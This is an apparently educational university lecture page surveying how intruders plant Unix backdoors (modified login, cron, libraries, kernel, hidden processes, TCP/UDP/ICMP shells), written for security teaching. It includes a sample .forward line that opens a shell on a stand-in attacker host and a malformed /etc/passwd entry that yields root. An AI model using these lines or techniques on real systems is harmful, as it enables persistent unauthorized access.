College of Engineering & CS
Wright State University
Dayton, Ohio 45435-0001 |
Backdoors
|
| |
|
|
| |
| Abstract: Vulnerabilities are of course
"backdoors." In this lecture, we focus on how an
attacker having obtained access to a system carefully plants
backdoors facilitating future visits. So called rootkits
also provide backdoors. These are discussed in a separate
lecture. |
| |
| This work is supported in part by NSF DUE-9951380. |
|
- Educational Objectives
- Backdoors
- Some Well Known Backdoors
- Backdooring Binary Objects
- Lab Experiment
- Acknowledgements
- References
Backdoors
The backdoor for most intruders provide two or three main functions.
- Be able to get back into a machine even if the administrator tries to
secure it, e.g., changing all the passwords.
- Be able to get back into the machine with the least amount of visibility.
Most backdoors provide a way to avoid being logged and many times the
machine can appear to have no one online even while an intruder is using it.
- Be able to get back into the machine with the least amount of time. Most
intruders want to easily get back into the machine without having to do all
the work of exploiting a hole to gain access.
Vulnerabilities and pre-installed Trojans are of course
"backdoors." In this lecture, we focus on how an attacker having
obtained access to a system carefully plants backdoors facilitating future
visits. So called rootkits also provide backdoors. These are
discussed in a separate lecture.
Some Well Known Backdoors
Below we summarize some of the backdoors that have been in use.
Login Backdoor
Install a modified login so that if you typed in the backdoor password, it would
allow you to log in regardless of what the password really is. Such
a backdoor would spawn access before the user actually logged in and appeared in
utmp and wtmp. To better hide such backdoor passwords from commands like
strings, one can encrypt and hide backdoor password better.
Telnetd Backdoor
Modify in.telnetd. A normal in.telnetd, does several checks such as the
terminal the user was using. Typically, the terminal setting might be Xterm or
VT100. An intruder could backdoor it so that when the terminal was set to,
say, "letmein", it would spawn a shell without requiring any
authentication.
Services Backdoor
Almost every network service has at one time been backdoored by an intruder.
Backdoored versions of finger, rsh, rexec, rlogin, ftp, even inetd, etc., have
been floating around forever. There are programs that
are nothing more than a shell connected to a TCP port with maybe a backdoor
password to gain access. These programs sometimes replace a service like uucp
that never gets used or they get added to the inetd.conf file as a new service.
Cron backdoor
Cron on Unix schedules the running of certain programs according to a
configuration file.. An intruder
could add a backdoor shell program to run between 1 AM and 2 AM. So for 1 hour
every night, the intruder could gain access. Intruders have also looked at
legitimate programs that typically run in cronjob and built backdoors into those
programs as well.
Library backdoors
Almost every UNIX system uses shared (*.so) libraries. The shared libraries are
intended to reuse many of the same routines thus cutting down on the size of
programs. Some intruders have backdoored routines like
crypt.o and _crypt.o. Programs like login.c would use the crypt() routine and if
a backdoor password was used it would spawn a shell. Therefore, even if the
administrator was checking the MD5 of the login program, it was still spawning a
backdoor routine and many administrators were not checking
the libraries as a possible source of backdoors.
Suppose we start doing MD5 checksums of almost everything. Attackers get around
that is to backdoor the open() library routine and file access routines. The
backdoor routines were configured to read the original files, but execute the
Trojan backdoors. Therefore, when the MD5 checksum program was reading these
files, the checksums always looked good. But when the system ran the program, it
executed the Trojan version. Even the trojan library itself, could be hidden
from the MD5 checksums. It is therefore necessary to statically link the MD5
checksum checker, and be very sure of the loader.
Kernel backdoors
The same method used for libraries for bypassing MD5 checksum could be used at
the kernel level. Even a statically linked MD5 program cannot tell the
difference.
File system backdoors
An intruder will want to store their loot or data on your server waiting for an
opportune time to transport it away. To hide these sometimes large files from an
administrator, an intruder may patch the files system commands like "ls",
"du", and "fsck" to hide the existence of certain
directories or files. In one case, an intruder created a section on the hard
drive to have a proprietary format that was designated as "bad"
sectors on the hard drive.
Bootblock backdoors
In the PC world, many viruses have hid themselves within the boot block section
and most antivirus software will check to see if the boot block has been
altered. On Unix, surprisingly, it is not typical to check the boot block,
therefore some intruders have placed backdoors in the boot block area.
Process hiding backdoors
Intruders want to hide the programs they are running. An intruder may write the
program to modify its own argv[] and give another process name. An
intruder could rename the sniffer program to a legitimate service like in.syslog.
An intruder could modify "ps" so that it does not show all the
processes. An intruder could patch a backdoor or program into an interrupt
driven routine so it does not appear in the process table. An intruder could
modify the kernel to hide certain processes as well.
Network traffic backdoors
There are many network backdoor programs that allow an intruder to set up on a
certain port number on a machine that will allow access without ever going
through the normal services. Because the traffic is
going to a non-standard network port, the administrator can overlook the
intruder's traffic. These network traffic backdoors are typically using TCP, UDP,
and ICMP, but it could be many other kinds of packets.
TCP Shell Backdoors
The intruder can set up these TCP Shell backdoors on some high port number
possibly where the firewall is not blocking that TCP port. Many times, they will
be protected with a password just so that an administrator that connects to it,
will not immediately see shell access. An administrator can look for these
connections with netstat.
UDP Shell Backdoors
Administrator many times can spot a TCP connection and notice the odd behavior,
while UDP shell backdoors lack any connection so netstat would not show an
intruder accessing the Unix machine. Many firewalls have been configured to
allow UDP packets for services like DNS through. Many times,
intruders will place the UDP Shell backdoor on that port and it will be allowed
to by-pass the firewall.
ICMP Shell Backdoors
Ping is one of the most common ways to find out if a machine is alive by sending
and receiving ICMP packets. Many firewalls allow outsiders to ping internal
machines. An intruder can put data in the ping ICMP packets and tunnel a shell
between the pinging machines. An administrator may notice a flurry of Ping
packets, but unless the administrator looks at the data in the packets, an
intruder can be unnoticed.
Encrypted Link
An administrator can set up a sniffer trying to see the data while a suspicious
someone is accessing a shell, but an intruder can add encryption to the Network
traffic backdoors and it becomes almost impossible to determine what is actually
being transmitted between two machines.
.forward Backdoor
On Unix machines, placing commands into the .forward file was also a common
method of regaining access. For the account ``username'' a .forward file might
be constructed as follows:
\username
|"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e /bin/sh"
Permutations of this method include alteration of the systems mail aliases file
(most commonly located at /etc/aliases). Note that this is a simple permutation,
the more advanced can run a simple script from the forward file that can take
arbitrary commands via stdin (after minor preprocessing).
Syntactic Problems in /etc/passwd
When parsing uid/gid in the /etc/password file, most login(1) implementations
will fail to detect non-numeric characters in the uid/gid field and the
standard atoi(3) will return 0, giving super user privileges. Example:
rmartin:x:x50:50:R. Martin:/home/rmartin:/bin/bash
On Linux boxes, this will give uid 0 to user rmartin.
Backdooring Binary Objects
The article by [klog] describes object backdooring methods by manipulating
the binaries.
none.
The section Some Well Known Backdoors is based on [Klaus].
- Christopher Klaus, "Backdoors", 8/4/97.
Reference.
- klog, Backdooring Binary Objects, P H R A C K M A G A Z I N E - Volume 0xa
Issue 0x38 05.01.2000 0x09[0x10] Recommended Reading.
- van Hauser / THC, Placing
Backdoors Through Firewalls, April 1998, http://www.itsecurity.com/
papers/p37.htm Required Reading after the Firewalls lecture.